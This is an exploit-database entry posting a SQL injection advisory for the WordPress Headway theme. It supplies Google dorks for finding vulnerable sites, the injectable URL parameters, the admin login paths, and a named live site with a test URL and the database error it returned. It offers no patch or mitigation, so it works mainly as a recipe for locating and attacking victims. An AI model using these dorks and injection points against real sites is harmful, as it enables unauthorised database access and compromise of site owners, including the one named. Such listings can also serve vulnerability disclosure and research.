Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | Not disclosed | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-05-30 |
####################################################################### Exploit Title : WordPress Headway Theme The Drag and Drop SQL Injection Vulnerability Author [ Discovered By ] : KingSkrupellos Date : 27/05/2018 Vendor Homepage : headwaythemes.com Tested On : Windows Exploit Risk : Medium ####################################################################### Google Dork : inurl:''/hindex.php?lT='' Google Dork 2 : intext:''Powered by Headway, the drag and drop WordPress theme'' Google Dork 3 : intext:''Proudly Powered by Headway and WordPress'' Exploit : /hindex.php?lT=[SQL Injection] /hindex.php?lT=[ID-Number]&noP=[SQL Injection] Admin Panel Login Path => /wordpress/wp-login.php or /wp-login.php ####################################################################### Example Site => cacbasketball.com/hindex.php?lT=1%27 [ Proof of Concept for SQL Injection ] => archive.is/UNxyP Error Performing Query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') ####################################################################### # Discovered By KingSkrupellos from Cyberizm Digital Security Team #######################################################################
Copyright ©2024 Exploitalert.